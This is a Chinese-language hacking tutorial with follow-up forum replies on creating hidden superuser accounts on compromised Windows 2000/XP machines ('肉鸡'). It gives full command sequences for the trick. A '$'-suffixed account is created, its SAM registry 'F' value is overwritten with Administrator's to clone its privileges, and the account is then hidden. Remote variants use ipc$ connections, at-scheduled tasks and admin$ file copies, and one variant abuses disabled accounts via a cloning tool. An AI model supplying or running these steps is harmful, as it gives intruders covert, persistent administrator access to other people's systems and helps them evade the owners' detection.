一、如何在图形界面建立隐藏的超级用户
图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序,修改键值的权限时在右键中点"权限"来修改。对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为"完全控制"权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:
1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户
net user hacker$ 1234 /add
2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
3、点"权限"以后会弹出窗口
点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为"完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
4、再点"开始"→"运行"并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。
打开键:HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"
5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。
6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可
8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用"net user"命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。
如何在命令行下远程建立隐藏的超级用户
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQL执行连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)
2、先与肉鸡建立连接,命令为: net use 13.50.97.238ipc$ "12345678" /user:"administrator
3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):at 13.50.97.238 12:51
c:winntsystem32net.exe user hacker$ 1234 /add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。
4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值:at 13.50.97.238 12:55
c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/e 是regedit.exe的参数,在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将"c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers"引起来。
5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy 13.50.97.238admin$system32hacker.reg
c:hacker.reg
修改的方法图形界中已经介绍过了,这里就不作介绍了。
6、再将编辑好的hacker.reg拷回肉鸡上 copy c:hacker.reg 13.50.97.238admin$system32hacker1.reg
7、查看肉鸡时间:net time 13.50.97.238 然后用at命令将用户hacker$删除:
at 13.50.97.238 13:40 net user hacker$ /del
8、验证hacker$是否删除:用
net use 13.50.97.238 /del 断开与肉鸡的连接。
net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。
9、再与肉鸡建立连接:net use 13.50.97.238ipc$ "12345678" /user:"administrator"
再取得肉鸡时间,用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:
at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg
regedit.exe的参数/s是指安静模式。
10、再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。
12、通过11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。
三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办?
这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能,你可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。
但是这里有两个前提:1、先用net use 肉鸡ipipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后,才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。
2、远程主机必须开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了)。
四、利用被禁用的帐户建立隐藏的超级用户:
我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:
1.想办法查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:"net user 用户名"一个一个来查看用户是否被禁用。
2.在这里,我们假设用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆程序CA.exe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会自动被激活了): CA.EXE 肉鸡ip Administrator 超级用户密码 hacher hacher密码。
3.如果你现在一个cmdshell,如利用telnet服务或SQL执行连接肉鸡的msSQL的默认端口1433得到的shell都可以,这时你只要输入命令:
net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hacher换成其它的被禁用的用户。
4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user 肉鸡ipipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。
5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式:at 肉鸡ip 时间 net user hacker /active:no
6.原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代,因而hacker就具有了超级用户的权限了,但是由于hacker在注册表内"C"健还是原来的"C"键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。
五、注意的几点事项:
1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。
2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。
3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的"系统状态"主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。
加分哦
欢迎界面下,只有administrator账号时显示,有其他账号时默认不显示administrator账号。
要解决这个问题,用命令 regedit 打开注册表
找到下面的分支
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
寻找 Administrator 这个数据项,
把它的值修改成 "1",
如果找不到就在空白处右击,新建一个"DWORD"值,改名"Administrator",把它的指修改成 "1",
那么你再次登陆时 就会在欢迎屏幕看到Administrator了
类似的如果把你自己新建的Owner(可能也没有,需要自己新建 )的值修改为"0"
那么你再次登陆时 Owner就不会出现在欢迎屏幕里了
点击“开始”→“运行”(或者按 win+R 组合键),输入“regedit”,回车,打开注册表编辑器,展开HKEY_LOCAL_MACHINE\SAM\SAM\分支
右击SAM,选择“权限”选中“Administrators (FREESKYC-165D01\Administrators)”,将下面的“完全控制”和“读取”勾为“允许”,应用、确定。
点击“开始”→“运行”(或者按 win+R 组合键),输入“cmd”,回车,打开了命令行,键入如下命令:
net user abc$ 123 /add 回车,其中abc$为用户名(abc可以改,但是最后的$符号是必须有的),123为密码
再键入以下命令可以给abc$ 帐户添加管理员权限:net localgroup administrators abc$ /add
关闭注册表编辑器,在命令行下敲入 regedit ,打开注册表编辑器,展开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
再展开Names,
单击“Administrator”,看,右边的“类型”一列为“0x1f4”,于是在左边找到“000001F4”并单击,然后双击右边的“F”,选中如图所示的数据并复制
假设刚才创建的用户是图中的me(记得后面要加 $ 符,否则不能达到隐藏的目的!) ,单击它,在右边的“类型”看到的是0x3f2
在左列找到000003F2并单击,双击右边的“F”选中如图所示的数据
按右键→粘贴,把刚才复制的内容替换上去,确定
在左列选中用户名 me ,然后点击“文件”→“导出”,将其保存(例如保存在桌面,文件名为 1.reg);再选中 000003F2 ,将其导出(例如保存在桌面,文件名为 2.reg)
回到命令行,执行以下命令:
net user abc$ /del
即删除 abc 这个帐户
现在可以关闭刚才的所有窗口了,去到1.reg和2.reg所在的文件夹,双击1.reg,点击确定,将其导入注册表,同样,也将2.reg导入。之后这两个文件可以删除了
此时无论是在控制面板还是在命令行下执行 net user 命令,都无法看到 abc$ 这个帐户,但是可以用这个帐户登录!在登录界面按Ctrl+Alt+Del组合键,输入用户名(包括$)和密码就可以登录,与Administrator权限相同!
你现在能不能进去如果现在进不去的话一切都是空谈
如果可以进去的话哪怕一次就行
在运行下面输入cmd在cmd输入net suer xxx$ xxx /add 前面的xxx是要建的用户名用户名后面一定要带$这个符号 后面的xxx为密码 这步好了之后 然后再输入net localgroup administrators xxx$ /add xxx为刚才建的用户 然后在运行下面输入regedt32 找到HKEY_LOCAL_MACHINE\SAM\SAM 右击这个东西有个权限设为完全控制 再回来在运行下面输入regedit 找到HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$" 这是刚才建好的用户的项 上面有对应的值在上面Usere里面展开就能看到 然后把建好的用户的值导出来 在把用户对应在Usere里面的值也导出来 再找到administrator对应的值也导出来(导出要文件选项里面有)一般为000001F4打开方式用记事本打开 把000001F4下面的F的值复制到建好的用户对应的Usere那个文件下面的F值下这步也就是覆盖掉那个F下面的值做好这步之后 在运行下面输入cmd 在cmd里面输入net user xxx$ /del 这步是删除了刚才建好的用户 这样在控制面板就看不见了
再在运行下面输入regedit 上面有个文件选项有个导入选项 导入刚才导出去的那几个文件就可以了 在进入要登录用户的那个窗口时按Ctrl+Alt+Del 按两次就会弹出个界面你再输入刚才建好的用户和密码就可进去了而且没有痕迹
尝试一下这个办法,对xp有效
右键我的电脑------------管理----------------本地用户和组---------------右键你创建的用户------------属性-----------------选项卡:隶属于-----------------------单击administrator,删除----------确定,完成
这个方法在一些xp上有效,但在安全模式下会显示出来
普通登陆界面下ctrl+alt+del调出登陆框在用户处输入你创建的账户即可登陆